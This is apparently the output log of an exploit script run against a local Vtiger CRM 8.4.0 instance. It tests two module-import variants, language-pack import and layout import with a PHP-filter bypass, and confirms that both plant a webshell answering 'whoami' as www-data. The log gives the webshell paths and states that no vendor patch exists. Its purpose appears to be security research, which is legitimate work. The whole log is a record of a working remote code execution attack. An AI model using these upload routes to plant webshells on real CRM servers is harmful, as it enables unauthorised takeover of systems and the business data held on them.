[+] Starting Vtiger CRM 8.4.0 module-import variant analysis [+] Variants under test: language-pack import, layout import PHP-filter bypass [*] Logging in as admin [*] Authenticated, current page: http://localhost/index.php [*] === Testing LANGUAGE PACK variant === [+] Created language pack variant: /tmp/variant_lang_Langojaheo/variant.zip [+] Upload accepted: file=usermodule_1783466058.zip name=Langojaheo type=language [+] Install response: {"success":true,"result":{"success":true,"importModuleName":"Langojaheo"}} [*] Triggering language webshell: http://localhost/languages/langojaheo/shell.php?cmd=whoami [+] Webshell output: 200 PRUVA_LANG_SHELL_OK www-data www-data [*] === Testing LAYOUT IMPORT variant (PHP content filter bypass) === [+] Created layout variant: /tmp/variant_layout_LayEqoLHv/variant.zip [+] Upload accepted: file=usermodule_1783466058.zip name=LayEqoLHv type=layout [+] Install response: {"success":true,"result":{"success":true,"importModuleName":"LayEqoLHv"}} [*] Triggering layout webshell: http://localhost/layouts/LayEqoLHv/skins/LayEqoLHv/shell.php?cmd=whoami [+] Webshell output: 200 PRUVA_LAYOUT_SHELL_OK www-data www-data [+] Language pack variant: CONFIRMED [+] Layout import bypass variant: CONFIRMED [+] Alternate triggers confirmed on Vtiger 8.4.0 (vulnerable version). [!] No vendor patch is available; cannot demonstrate a true bypass of a fixed version.